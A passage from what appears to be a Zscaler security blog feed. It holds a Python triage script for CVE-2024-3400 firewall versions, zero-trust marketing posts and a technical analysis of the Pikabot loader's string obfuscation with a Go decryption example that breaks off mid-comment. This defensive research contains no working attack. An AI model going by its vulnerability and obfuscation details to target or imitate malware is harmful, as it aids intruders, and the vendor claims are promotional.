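    return "fixed" if parsed >= parse_panos_version(fixed) else "vulnerable"


def triage_inventory(inventory: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group firewall hostnames by status so the ones still needing a hotfix stand out."""
    groups: Dict[str, List[str]] = {"vulnerable": [], "fixed": [], "not listed": []}
    for hostname, version in inventory:
        groups[cve_2024_3400_status(version)].append(hostname)
    return groups


# Constructed sample inventory: hypothetical hostnames and versions, not real devices.
SAMPLE_INVENTORY: List[Tuple[str, str]] = [
    ("fw-dc1-edge", "11.1.2-h2"),   # one hotfix short of the fixed release
    ("fw-dc1-core", "11.1.2-h3"),   # exactly the fixed release
    ("fw-branch-01", "11.0.4"),     # base release without the -h1 hotfix
    ("fw-branch-02", "10.2.10"),    # later maintenance release on a fixed train
    ("fw-lab", "10.1.11"),          # train not covered by the published table
]

if __name__ == "__main__":
    for status, hosts in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{status:>10}: {', '.join(hosts) or '-'}")
```

Run against the sample inventory, the two hosts below their train's hotfix are listed as vulnerable, the two at or above it as fixed, and the 10.1 host as not listed; a malformed version string raises ValueError rather than being silently classified.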
Customers are advised to temporarily disable device telemetry as an alternative mitigation for this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days.

In response to this risk, Palo Alto Networks advises customers to temporarily disable device telemetry as an alternative mitigation for this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices.

Affected Versions

Version | Affected Versions
PAN-OS 11.1 | < 11.1.2-h3
PAN-OS 11.0 | < 11.0.4-h1
PAN-OS 10.2 | < 10.2.9-h1

The problem is legacy technology

The GlobalProtect vulnerability is the latest in a long line of VPN- and firewall-related security flaws. It’s April, and we have already seen critical CVEs for Ivanti, SonicWall, Fortinet, and Cisco VPN solutions. This shows that the problem is not the vendor, but the vulnerable legacy architecture that makes these products a prime target for threat actors.

VPNs were first used in 1996, a time when many of today’s complex and sophisticated cyberattacks did not exist. Traditional firewalls have been around even longer. Nearly three decades later, threat actors are still regularly finding ways to exploit these technologies. These assets expose organizations to enormous risk because:

- They are externally exposed — ‘if it's reachable, it's breachable’.
- Their flawed architecture provides a beachhead into corporate environments, leading to lateral propagation, data exfiltration, and compromise of the entire environment.

The fundamental problem with VPNs and firewalls is that they create a public-facing point of contact to the outside world. They present sophisticated threat actors an opportunity to attack your organization until they discover a way in — think zero-day vulnerabilities.
They bring both your users and threat actors (in the event of a successful exploit) onto your network. Given the potential reward from a successful exploit, we will continue to see threat actors targeting VPNs and firewalls.

Recent zero-day vulnerabilities in exposed VPNs and firewalls

One recent case of legacy architecture leading to zero-day exploits is the set of Ivanti vulnerabilities disclosed in December 2023. Multiple zero-day vulnerabilities in Ivanti’s VPN products were exploited by Chinese state-backed hackers taking advantage of flaws described in CVE-2023-46805 and CVE-2023-21887. The adversaries used these vulnerabilities to perform authentication bypass and remote command injection. Once these flaws were patched, attackers bypassed the fixes by leveraging other vulnerabilities (CVE-2024-21888). The workarounds used to circumvent the initial patch allowed attackers to escalate privileges and perform server-side request forgery.

In February 2024, CISA released another VPN-related alert about an attack on Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD). In this case, the Akira ransomware group exploited a vulnerability (CVE-2020-3259) to steal information by leveraging misconfigured instances of WebVPN/AnyConnect. These repeated zero-day attacks on VPNs show that the real issue is the outdated architecture, not the specific vendors involved.

How zero-day threats enable the four-stage attack sequence

Enterprises should understand that attackers target vulnerabilities in their exposed, internet-connected assets. This includes firewalls and VPNs, which are among the primary vectors used to breach organizations and steal their data.
Moreover, it is not only these initial assets that expose enterprises to enormous risk — it is also the underlying network architecture, which allows attackers, once they have compromised these initial assets, to move laterally, find enterprises’ most critical applications and data stores, and steal their data.

- Reconnaissance. Attackers scan for critical vulnerabilities in the external enterprise attack surface, including zero-day vulnerabilities in VPNs and firewalls.
- Initial compromise. Threat actors exploit these VPN and firewall vulnerabilities to gain initial access to enterprises’ devices and networks.
- Move laterally. Attackers establish persistence and move laterally across the network, scanning for high-value assets, stealing other credentials, and compromising additional systems.
- Steal data. Once threat actors have compromised your critical assets and data, they will work to exfiltrate it from the network. In the case of ransomware, attackers may additionally deploy ransomware, often leveraging a domain controller, to bring down the victim’s environment.

Figure 3. The four-stage attack sequence.

How can enterprises reduce the impact of zero-day attacks?

While it will always be essential for enterprises to patch critical vulnerabilities, the only meaningful way to stay ahead of these types of zero-day attacks is to adopt a zero trust architecture and, from a first-principles perspective, avoid them altogether. Here are some fundamental zero trust principles that organizations can adopt to mitigate the risks of exposed assets like VPNs, firewalls, and more.

Eliminate Your Attack Surface: Implement Zero Trust

While the term ‘zero trust’ is heavily used (and abused), it’s for good reason: zero trust principles, and their accompanying architecture, represent the only way enterprises can overcome the risks associated with legacy networks, including vulnerabilities in firewalls and VPNs.
These principles are not merely buzzwords applied to legacy products (virtualized VPNs and firewalls are not zero trust) — they are goals that require technological transformation and a cloud-first approach to accomplish. Per the NSA Zero Trust Security Model, there are three fundamental principles enterprises should adopt.

- Never trust, always verify. Enterprises should treat every user, device, application, workload, or data flow as untrusted. Moreover, enterprises should never connect users to the underlying network, but directly to applications using a cloud-proxy architecture.
- Assume a breach has happened. Particularly given the recent pace of zero-day vulnerability disclosures, enterprises should operate with the assumption that threat actors have already gained persistence in their environment, and defend their crown jewel applications — where their most critical data is stored — accordingly.
- Verify explicitly with least-privilege access. Enterprises should allow trust only after seven layers of zero trust security, identity, and contextual attributes have been established.

Figure 4. Seven layers of security enabled with a zero trust architecture (in this case the Zscaler Zero Trust Exchange).

In practice, a zero trust architecture is fundamentally different from those built on firewalls and VPNs. Compared to traditional, perimeter-based networking approaches, which place users on the enterprise network, a zero trust architecture enables one-to-one connectivity between requesters and resources. This could include, for instance, users connecting to applications, but it could also enable connectivity between workloads, branch locations, remote users and operational technology (OT) systems, and much more.

A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange:

- Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud.
- Stops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real time.
- Eliminates lateral threat movement by connecting entities to individual IT resources instead of extending access to the entire network.
- Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use.

Best practices for enterprises

In light of these recent zero-day vulnerabilities, it is imperative that enterprises employ the following best practices to fortify their organization against potential exploits:

- Minimize the attack surface: make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can’t gain initial access.
- Prevent initial compromise: inspect all traffic inline to automatically stop zero-day exploits, malware, or other sophisticated threats.
- Enforce least-privileged access: restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources.
- Block unauthorized access: use strong multi-factor authentication (MFA) to validate user access requests.
- Eliminate lateral movement: connect users directly to apps, not the network, to limit the blast radius of a potential incident.
- Shut down compromised users and insider threats: enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data.
- Stop data loss: inspect data in motion and data at rest to stop active data theft during an attack.
- Deploy active defenses: leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time.
- Test your security posture: get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program.
Request that your service providers and technology partners do the same and share the results of these reports with your security team.

Conclusion

Today’s zero-day vulnerability impacting Palo Alto Networks’ GlobalProtect Gateway product represents yet another unfortunate milestone in a clear enterprise trend: traditional, perimeter-based approaches to security and networking face systemic, not temporary, security weaknesses that cannot be waved away with any single security patch. Of course, no vendor can be immune from software defects and vulnerabilities. However, given the back-to-back CVEs impacting firewalls, VPNs, supply chain tools, and more, it should be clear to security leaders and practitioners that zero trust security is crucial. Adopting a cloud-delivered zero trust architecture removes the attack surface created by legacy technology. Denying attackers their traditional beachheads — the vulnerabilities in VPNs, firewalls, and the like — is key to creating a more robust and secure environment.

References

https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
https://unit42.paloaltonetworks.com/cve-2024-3400/

If you are concerned about these vulnerabilities, please contact Zscaler at [email protected] for a free external attack surface assessment as well as professional consultation on how you can migrate from legacy architectures to Zero Trust.

Acknowledgement for analysis: Atinderpal Singh, Will Seaton

Fri, 12 Apr 2024 22:23:31 -0700 Deepen Desai https://www.zscaler.com/blogs/security-research/another-cve-pan-os-zero-day-another-reason-consider-zero-trust

Why You Need a Proven Platform for Zero Trust
https://www.zscaler.com/blogs/product-insights/why-you-need-proven-platform-zero-trust

Organizations need a proven platform for zero trust. But before we dive into why that is the case, we must first answer two important questions.

What is zero trust?
Zero trust is a distinct architecture that provides secure connectivity based on the principle of least-privileged access. It inherently prevents excessive permissions, and gives users and entities access only to the specific IT resources they need in order to do their jobs. On top of that, zero trust means analyzing context to assess risk and determine whether or not to grant access, rather than using identity alone to do so. This is all achieved through a cloud platform that delivers zero trust connectivity as a service at the edge—meaning from as close to the end user as possible. In short, think of a zero trust platform as an intelligent switchboard.

Figure 1: Zero trust architecture with Zscaler

What is zero trust not?

Yesterday’s perimeter-based architectures are built on firewalls and VPNs, which connect users to the networks that house resources rather than connecting them directly to the resources themselves. A commonly used name for such an architecture—castle-and-moat—illustrates the way that it is designed to function. That is, establishing a moat (perimeter) around a castle (network) in order to keep bad things out and good things in. However, if a threat makes it past the moat, there’s no second line of defense to prevent the threat from entering the castle and having free rein to move about within it. In security terms, we call this lateral movement—when a threat moves across network resources unrestricted. To read more about lateral threat movement and other shortcomings of perimeter-based architecture, you can read this ebook.

Figure 2: Perimeter-based architecture

Now that we understand zero trust as a distinct, cloud-delivered architecture, let’s return to our original point that organizations need a proven platform for zero trust. Namely, a vendor’s zero trust offering must be proven across the three key areas described below.
Scalability

When all of an organization’s traffic is routed through a zero trust vendor’s cloud for security and connectivity, that cloud platform becomes a mission-critical service that must have the scalability necessary to ramp up with customers’ evolving traffic volumes in real time. Without it, organizations’ security and connectivity grind to a halt, taking productivity down with them.

Additionally, a lack of scalability means that encrypted traffic typically goes at least partially (and sometimes completely) uninspected. This is because inspecting encrypted traffic is a resource-intensive process that requires a high level of performance. With 95% of web traffic now encrypted—and cybercriminals hiding 86% of their attacks within it—organizations must be able to inspect encrypted traffic at scale if they are to stop threats and data loss.

One may assume that these scalability challenges only arise for larger organizations, but that is untrue. Without a proven zero trust platform that can scale, smaller organizations can also face these challenges, particularly as their businesses grow and their vendors need to ramp up services seamlessly. In other words, organizations of all sizes need a zero trust platform built on a cloud with proven scalability.

Something you may not know about Zscaler is that our name stands for “zenith of scalability.” Since our company was founded, we’ve been committed to delivering unrivaled performance. The Zero Trust Exchange, the name of Zscaler’s zero trust platform, is the world’s largest inline security cloud.
It boasts a variety of statistics and proof points that demonstrate its massive capacity for scale:

- 150 data centers worldwide (not merely on-ramps or vPoPs)
- 400 billion requests processed each day
- 500 trillion telemetry signals analyzed daily
- 9 billion incidents and policy violations prevented each day
- 150 million cyberthreats blocked daily
- 250,000 unique security updates implemented each day

So, when it comes to choosing a zero trust platform, why settle for anything less than the zenith of scalability?

Figure 3: A snapshot of some of Zscaler’s data centers around the world

Resilience

Business continuity planning for mission-critical services is a board-level priority for IT leaders. As mentioned previously, a zero trust platform’s strategic inline position between users, workloads, apps, and more makes it a mission-critical service. As such, organizations need to know that unforeseen events won’t disrupt their vendor’s services; otherwise, security, connectivity, and productivity will all suffer.

Zscaler Resilience is a core component of the Zero Trust Exchange. It is a complete set of resilience capabilities that offers high availability and serviceability at all times. Customer-controlled disaster recovery features and other robust failover options ensure uninterrupted business continuity, even during catastrophic events. Zscaler offers the following capabilities for the following scenarios:

- For minor failures, such as node crashes or software bugs, Zscaler can effectively handle the issues with minimal customer interaction.
- In the event of brownouts or service degradation issues, Zscaler Resilience offers dynamic, performance-based service edge selection, customer-controlled data center exclusion, and other failover mechanisms to maintain seamless experiences for users.
- For blackouts or severe connectivity issues, Zscaler provides failover options to redirect traffic to nearby secondary Zscaler data centers, ensuring that users can continue to access mission-critical applications.
- If there are catastrophic events, Zscaler Resilience provides customer-controlled disaster recovery capabilities, allowing organizations to keep their operations running by routing traffic to private service edges and restricting access to critical applications.

Figure 4: Zscaler Resilience functionality

A history of customer success

In addition to scalability and resilience, zero trust platforms must have demonstrated success with actual customers using their services. Organizations need to see the success stories of customers that are similar to them in terms of size, industry, and their security and connectivity challenges—only then should they trust their vendor of choice. This is particularly true for bigger organizations because they need evidence that a zero trust platform can handle larger volumes of traffic and more rigorous performance requirements.

At Zscaler, we have a litany of customer success stories available on our website in the form of videos, blogs, case studies, and press releases. Our company has demonstrated success with organizations of all sizes and in all geographies—from small, 100-user organizations like the Commonwealth Grants Commission in Australia, to those with hundreds of thousands of users, like Siemens in Germany, and beyond, to the New York City Department of Education and the 1 million users it secures with the Zero Trust Exchange.
Here are some more facts and figures that demonstrate our customers’ trust and belief in our platform:

- Nearly 8,000 customers of all sizes, industries, and geographies
- Over 41 million users secured by the Zero Trust Exchange
- A Net Promoter Score of more than 70 (the average SaaS company’s is 30)
- More than 40% of the Fortune 500 are customers
- More than 30% of the Global 2,000 are customers

Below are some of our customers across a variety of industries. Each logo is associated with a public-facing customer success story that can be found on our website by typing the customer’s name into the search feature.

Figure 5: A snapshot of some Zscaler customers

Where to go from here

If you are still getting your feet wet with zero trust and would like to listen to an entry-level discussion on the subject, register for our monthly webinar, Start Here: An Introduction to Zero Trust. You may also want to read our ebook, 4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches. Or, if you would like to learn more about Zscaler Resilience and how the Zero Trust Exchange provides uninterrupted business continuity to customers, read our solution brief.

Tue, 16 Apr 2024 07:30:01 -0700 Jacob Serpa https://www.zscaler.com/blogs/product-insights/why-you-need-proven-platform-zero-trust

Zscaler Announces Intent to Acquire Airgap Networks to Extend Zero Trust SASE Leadership and Eliminate the Need for Firewall-based Segmentation
https://www.zscaler.com/blogs/company-news/zscaler-acquires-airgap-networks-extends-zero-trust-sase

Overview

Today, Zscaler has announced the next major step in its Zero Trust SASE leadership by signing an agreement to acquire Airgap Networks, which provides agentless segmentation for enterprise IT and OT environments. With this acquisition, Zscaler will combine its Zero Trust SD-WAN with Airgap to extend the Zero Trust Exchange to protect east-west traffic in branch offices, campuses, factories and plants with critical OT infrastructure.
This next step in our SASE leadership will eliminate the need for east-west firewalls, NACs and microsegmentation and deliver greater operational simplicity.

Controlling lateral movement is the cornerstone of Zero Trust

To understand why today’s news is important, let’s reflect on the challenges that organizations face in combating attackers. Adversaries are becoming faster and ever more effective at evading even the most sophisticated security controls with AI-enhanced social engineering and identity-based attacks. Once they compromise an organization, they then move laterally to get to sensitive data or critical resources. Once the targets or crown jewels (typically high-value data) have been identified and reached, the goal is to exfiltrate the data as quickly and quietly as possible.

While Zero Trust cannot be achieved without a holistic strategy that addresses every stage of this typical cyber attack chain - also known as a defense-in-depth approach - restricting lateral movement, and proper containment of the adversary once your organization has been compromised, is where real Zero Trust technologies must prove their worth. To date, the primary vehicle for addressing lateral movement on local area networks has been network-based segmentation and microsegmentation.

How traditional segmentation and firewalls have fallen short

Segmentation has been carried out with aging, IP-centric networking technologies like NAC and east-west firewalls, managed through complex constructs like ACLs based on MAC addresses, IP addresses and VLANs. This complexity places considerable strain on network operations teams, which are forced to write, maintain and update countless ACLs or internal firewall rules while addressing the inevitable misconfigurations that break business-critical applications or leave gaps in segmentation coverage.
The complexity that east-west firewalls bring means most segmentation projects are never fully implemented, and even those with partial completion quickly experience segmentation policy drift as workloads and applications move and organizations’ environments change.

The significance of a ‘network of one’

Why is Airgap’s technology so compelling? Their agentless, identity-based approach to segmentation is a total rethink of the complexity of legacy segmentation approaches, for stronger, more predictable segmentation outcomes and greater operational simplicity. This highly secure but simplified approach includes a Dynamic Host Configuration Protocol (DHCP) proxy, which creates a "network of one" for all connected endpoints, including those configured with static IP addresses. The DHCP proxy intercepts all DHCP requests from devices trying to join the LAN. This enables Airgap to assign a /32 IP address and default gateway, effectively creating a segment of one: with a /32 mask the device has no on-link neighbors, so even traffic to a device on the same VLAN must pass through the gateway, where policy can be applied. Airgap can then dynamically control access through continuous assessment of identity and context. Now, Airgap can provide visibility and policy enforcement at every connected endpoint without adding any software to those sensitive endpoints. This approach eliminates the risk of east-west lateral movement on local networks as well as the complexity of traditional segmentation approaches like east-west firewalls, without hardware upgrades or operational disruption.

Agentless Segmentation

It is critical to understand that an agentless approach is essential for effective east-west segmentation on LANs, given that in many scenarios, be it unmanaged devices, aging legacy servers, or headless IoT/OT infrastructure, deploying agents is an impossibility. However, with Airgap, Zero Trust segmentation is possible in campus LAN and OT environments, no matter the device.
Comprehensive Zero Trust Segmentation

If you have been a customer or followed Zscaler, you’ll know we take segmentation very seriously, as a measure to counter lateral movement of threats. In the Zero Trust Exchange, we currently protect thousands of organizations with Zero Trust Segmentation, which comprises multiple methods of segmentation depending on the environment and scenario. This includes Zero Trust SD-WAN to securely connect locations and segment them without site-to-site VPNs. Zero Trust Segmentation is made up of:

- User-to-app segmentation: Users access private applications directly, without being put on a network.
- Location segmentation: Zero Trust SD-WAN ensures connections are made directly to applications from an office, rather than connecting to a routable network. No more site-to-site VPNs.
- Workload segmentation: Least-privilege access segments cloud workload-to-workload communications across hybrid and multi-cloud environments.

Now with Airgap, we further extend Zero Trust Segmentation to deliver visibility and segmentation for east-west traffic on LANs, including critical OT environments. Some of the use cases that can be addressed on day one are:

East-West Firewall Replacement

We will extend Zero Trust to the LAN by enforcing segmentation on east-west traffic. This shrinks the internal attack surface and eliminates the threat of lateral movement on campus, data center, and OT networks. There is no need for NAC or firewall-based segmentation. To enforce zero trust segmentation on campus, branch, and data center networks, Airgap will:

- Automatically provision every device into a segment of one (/32).
- Auto-group devices, users and apps by analyzing traffic patterns. This prevents rogue devices using MAC spoofing from getting onto the network.
- Dynamically enforce policies for east-west traffic based on the identity and context of users and devices.
IT/OT Segmentation

Airgap’s technology acts as a ransomware kill switch, disabling non-essential device communication to halt lateral threat movement without interrupting business operations. Airgap’s solution neutralizes advanced threats, such as ransomware, on IoT devices, OT systems, and agent-incapable devices. To secure IoT and OT, Airgap will:

- Autonomously group and enforce policy for known MAC addresses on any device; e.g. RDP access to cameras is denied except for admins.
- Automatically isolate unknown MAC addresses to limit the blast radius in case of a compromised device.
- Integrate with asset management systems for secure access control policies.

Automatic Device Discovery & Classification

A significant portion of IT/OT traffic stays within the factory or campus, hence it is important to have continuous visibility into east-west traffic. With automatic device discovery and classification, network admins can better manage performance, uptime and security for IoT/OT systems without complex inventory management. For network and device visibility, Airgap will:

- Discover, classify and inventory IoT/OT devices without the need for endpoint agents.
- Get a baseline of traffic patterns and device behaviors in order to determine authorized and unauthorized access.
- Gain AI-driven network insights for performance management and threat mapping.

Modern segmentation for the enterprise, without the complexity

- Eliminate lateral threat movement across LANs.
- Reduce operational complexity and cost associated with legacy segmentation tools.
- Gain enhanced visibility into east-west traffic with discovery, classification and device inventory without the need for endpoint agents.

We invite you to learn more about Airgap’s technology in an upcoming briefing on April 16th.
Thu, 11 Apr 2024 05:00:00 -0700 Naresh Kumar https://www.zscaler.com/blogs/company-news/zscaler-acquires-airgap-networks-extends-zero-trust-sase

Zscaler is showcasing Zero Trust + AI at the 2024 AWS Summit events across Europe
https://www.zscaler.com/blogs/company-news/zscaler-is-showcasing-zero-trust-and-ai-at-the-2024-aws-summit-events-across-europe

In today’s dynamic digital landscape, organizations are rapidly adopting artificial intelligence (AI) and generative AI (GenAI) tools to increase productivity, gain new insights, and obtain a competitive advantage. The newly released Zscaler ThreatLabz 2024 AI Security Report sheds light on key trends, risks, and best practices in enterprise AI adoption, along with insights into AI-driven threats and key strategies to defend against them. Analyzing over 18 billion transactions from April 2023 to January 2024 across the Zscaler Zero Trust Exchange cloud security platform, some of the key findings are:

- Enterprise use of AI/ML tools has skyrocketed by nearly 600%
- 569 terabytes of enterprise data exchanged with AI tools
- ChatGPT usage has increased by 634%, even though it is also the most-blocked AI application by enterprise organizations
- AI is empowering threat actors in unprecedented ways

This is not just a numerical phenomenon but represents a profound shift in the way organizations across industries and geographies are embracing AI technologies. However, with terabytes of data sent to various AI tools, the need for effective data protection measures is a top priority. This is driven not only by the need to classify and protect sensitive data to prevent it from leaving the organization by mistake, but also by the need to prevent data exfiltration caused by bad actors, malware, and new AI-powered threats.
Never has the demand for robust cybersecurity been more important.

Zscaler Leadership and Advantage: In AI, Data Wins

Enabling more secure use of AI and GenAI tools in organizations and using AI to provide a stronger security posture are two crucial aspects of the modern landscape. An AWS Advanced Technology Partner, Zscaler has been a leader in zero trust for over a decade. As organizations wage the battle against cyberattacks, they must deploy robust defense systems, including zero trust architectures that utilize AI to effectively combat evolving threats, while keeping users productive.

The best AI is powered by the best data, and that is what makes Zscaler stand out. Operating the world's largest security cloud and processing over 400 billion transactions daily, Zscaler ensures access to the most relevant cyber threat data. Prioritizing three key elements for effective enterprise AI (vast datasets exceeding 500 trillion daily signals, deep domain expertise, and a skilled team of data scientists), Zscaler leverages complete logs, full URLs, and anonymized data to train its LLMs. This approach ensures rich data for AI training, unlike DNS and firewall logs, which often lack detail or are blind to encrypted traffic. As a result, Zscaler continually improves its AI models with high-volume, high-quality data, empowering IT and security teams with valuable insights and solutions.

Come and visit us at the 2024 AWS Summit events

As apps move to the cloud, cyberattacks become more sophisticated, and users work from anywhere on any device, perimeter security using VPNs and firewalls provides incomplete, inconsistent security and a poor user experience. With the Zero Trust Exchange powered by AI, Zscaler provides comprehensive visibility, control, and security for all cloud-based applications within a unified platform.
At the 2024 AWS Summit events, you can discover how Zscaler empowers organizations to:

- Improve security posture with zero trust
- Reduce attack surface and prevent lateral threats
- Accelerate migration of on-prem apps to AWS
- Enjoy fast, direct access to private apps and workloads
- Deploy AI-powered security for sensitive data, workloads, and GenAI data
- And more

Visit us at the 2024 AWS Summit events, which include EMEA stops at:

- Amsterdam on April 9
- London on April 24
- Berlin on May 15-16
- Milan on May 23
- Stockholm on June 4
- Madrid on June 5

The 2024 AWS Summits are free events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Stop by our booth to learn more about Zscaler solutions for AWS and how to safely embrace GenAI tools while leveraging AI for an improved security posture. To learn more about the 2024 EMEA AWS Summit events and to register, click here. And to learn more about Zscaler solutions for AWS, visit our website.

Tue, 09 Apr 2024 02:07:52 -0700 Yaroslav Rosomakho https://www.zscaler.com/blogs/company-news/zscaler-is-showcasing-zero-trust-and-ai-at-the-2024-aws-summit-events-across-europe

Automating Pikabot’s String Deobfuscation https://www.zscaler.com/blogs/security-research/automating-pikabot-s-string-deobfuscation

Introduction

Pikabot is a malware loader that originally emerged in early 2023, with one of its prominent features being the code obfuscation that it leverages to evade detection and thwart technical analysis. Pikabot employed the obfuscation method to encrypt binary strings, including the addresses of the command-and-control (C2) servers. In this article, we briefly describe the obfuscation method used by Pikabot and present an IDA plugin (with source code) that we developed to assist in our binary analysis. As mentioned in our previous article, the obfuscation method was removed when Pikabot re-emerged with a new version in early 2024.
As of April 2024, this obfuscation method has not been used again in any Pikabot samples.

Key Takeaways

- Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023.
- Previous versions of Pikabot used advanced string encryption techniques, which have since been replaced with simpler algorithms.
- Previously, the strings were encrypted using a combination of the AES-CBC and RC4 algorithms. The string obfuscation’s implementation is similar to ADVobfuscator.
- In this article, we describe the binary strings’ obfuscation algorithm and our approach to decrypting the binary strings using IDA’s microcode.
- Zscaler ThreatLabz developed an IDA plugin to automatically decrypt Pikabot’s obfuscated strings and is releasing the source code.

Technical Analysis

Strings obfuscation

The steps for decrypting a Pikabot string are relatively simple. Each string is decrypted only when required (in other words, Pikabot does not decrypt all strings at once). Pikabot follows the steps below to decrypt a string:

1. Pushes the encrypted string array onto the stack.
2. Initializes the RC4 encryption algorithm. The RC4 key is different for each string (with very few exceptions).
3. Takes the decrypted RC4 output, replaces all instances of the character ‘_’ (underscore) with ‘=’ (equals sign), decodes the result using Base64, and decrypts it using the AES-CBC algorithm. The AES key and initialization vector (IV) are the same for all strings.

ANALYST NOTE: Some strings are encrypted with the RC4 algorithm only.

Figure 1 shows the code used to decrypt the string Kernel32.dll.

Figure 1: Example Pikabot string decryption for Kernel32.dll.

Figure 2 shows the function that first decrypts the AES key and IV. The RC4-decrypted string passed to the function is then Base64 decoded and finally decrypted using AES.

Figure 2: Pikabot Base64 decoding and AES decryption function.
Decrypting Pikabot strings

The following information is required to decrypt a Pikabot string:

- The AES key and IV of a binary sample.
- The RC4-encrypted array of each string.
- The RC4 key of each encrypted string.
- The string’s size.

Our approach relies on IDA’s microcode. This decision helped us with several problems, such as:

- IDA’s microcode converts the assignment/copy of the RC4 key into a strcpy function. At the assembly level, this could be either multiple mov instructions or rep instructions, which would make detection and extraction harder.
- Extracting the RC4-encrypted array. Since IDA reconstructs the stack, it is much easier to search for and extract the encrypted array.

IDA’s microcode brings other limitations (for example, decompilation failure for a function), but no such issues were encountered for the parts of the code we wanted to analyze. In the sections below, we describe how each component was extracted.

Extracting the AES key/IV

For the extraction of the AES key and IV, we iterate over all analyzed functions and discard any function whose size is not between 600 and 1,600 bytes. Next, we scan the functions for the following patterns:

- Existence of RC4 encryption. This is the same heuristic we use for detecting encrypted RC4 strings.
- Existence of the values 0x3D and 0x5F (used before Base64 decoding the string) in conjunction with the microcode opcodes m_stx and m_jnz, respectively.

Lastly, if all of the patterns above match, then the handler for decrypting a Pikabot string is invoked. For the classification of the key and the IV, we apply the following checks:

- The number of decrypted strings from the identified function must be two. Otherwise, the identified function is incorrect.
- The longest string is marked as the AES key (by taking the first 32 bytes) and the remaining decrypted string as the IV (by taking the first 16 bytes).
Extracting the RC4 encrypted array

Pikabot constructs the RC4-encrypted array by pushing it onto the stack and then decrypting it. Our approach involves the following steps for detecting each part of the array:

1. Use the detected RC4 encryption block address as a starting point.
2. Search for the microcode opcode m_add in the decryption instruction. The detected microcode holds the starting stack offset of the encrypted array.
3. Iterate backwards and search for the microcode opcodes m_mov/m_call; the second opcode is needed in case the data is copied via a strcpy or memcpy call.
4. If the stack offset matches, save the data and update the stack offset.
5. Repeat this process until the reconstructed encrypted array has the expected size.

Extracting the RC4 encrypted array size

The length of the encrypted array is extracted in a similar way to the encrypted array. The detection pattern is:

1. Use the detected RC4 encryption block address as a starting point.
2. Search for the microcode opcodes m_jb, m_jae, and m_setb, and use the immediate constant in the instruction as the size.

Extracting the RC4 key

Extracting the RC4 key of each string proved to be the most challenging part of creating the plugin. In our first attempt, we extracted the RC4 key after detecting the initialization of the RC4 algorithm. However, this approach had the following issues:

- Incorrect extraction of the RC4 key: In many cases, an invalid/junk string was placed between the correct RC4 key and the RC4 algorithm initialization.
- Incorrect detection of the RC4 initialization code block: For example, if the size of the encrypted array was 256 bytes, then an incorrect RC4 key would be detected, since a loop over a 256-byte array resembles RC4’s 256-iteration key-scheduling loop.

Instead of trying to detect the RC4 key by detecting the initialization of the RC4 algorithm, we decided to extract all strings from each targeted function.
Then, we decrypted the RC4-encrypted array with each extracted RC4 key and validated the decrypted output by applying the following checks:

- The output matches the expected string size.
- All characters of the string are readable (for example, the decrypted string does not contain any junk characters).

ANALYST NOTE: After successful decryption, the RC4 key is marked and not reused in order to limit false positives.

IDA Plugin

We tested our Pikabot plugin with IDA versions 8 and newer. The plugin can be executed by compiling the source code using IDA's SDK and/or copying the generated DLL into the IDA plugins folder. After a Pikabot sample is loaded, the user can decompile a function, right-click in the decompiled output, and choose either to decrypt strings in the current function or in all functions (Figure 3).

Figure 3: IDA Pikabot plugin options.

For each decrypted string, the plugin sets a comment in the decompiled output. Figure 4 shows a function with the obfuscated strings before the plugin is invoked.

Figure 4: Before running the Pikabot string decryption plugin.

Figure 5 shows the output after our Pikabot IDA plugin is executed.

Figure 5: Output after running the Pikabot string decryption plugin.

Source Code

The source code for our IDA plugin to deobfuscate Pikabot strings can be found at this GitHub repository.

Conclusion

Older Pikabot variants include a string obfuscation implementation that can make automation a complicated task. By using IDA’s microcode and developing our own plugin, we were able to speed up our analysis in most cases and analyze the code much faster. Since this technique is no longer used by Pikabot, we decided to open source our IDA plugin to assist the research community with defeating current and future stack-based obfuscation techniques.
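The decryption chain from the "Strings obfuscation" section (RC4, then ‘_’ restored to ‘=’, Base64 decode, AES-CBC) and the key-recovery validation just described (try every candidate string as the RC4 key, accept only readable output that survives the whole chain, mark a consumed key so it is not reused) are shown together below in Go. This is an added example written for this page; it is not code from the article or from the ThreatLabz IDA plugin. The AES key/IV, the RC4 key and the candidate strings are constructed here, PKCS#7 padding is an assumption (the article does not name Pikabot's padding scheme), and EncryptFixture exists only to build test input by running the chain in reverse.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rc4"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// Constructed sample key material; NOT values taken from any Pikabot sample.
var (
	sampleAESKey = []byte("0123456789abcdef0123456789abcdef") // 32 bytes, as the plugin takes for the key
	sampleAESIV  = []byte("fedcba9876543210")                 // 16 bytes, as the plugin takes for the IV
)

// rc4Xor applies RC4 (same operation for encryption and decryption); nil on a bad key length.
func rc4Xor(key, data []byte) []byte {
	c, err := rc4.NewCipher(key)
	if err != nil {
		return nil
	}
	out := make([]byte, len(data))
	c.XORKeyStream(out, data)
	return out
}

// isReadable is the article's "all characters readable" check: non-empty, printable ASCII only.
func isReadable(b []byte) bool {
	for _, c := range b {
		if c < 0x20 || c > 0x7e {
			return false
		}
	}
	return len(b) > 0
}

// DecryptString runs the chain the article describes: RC4, '_' restored to '=',
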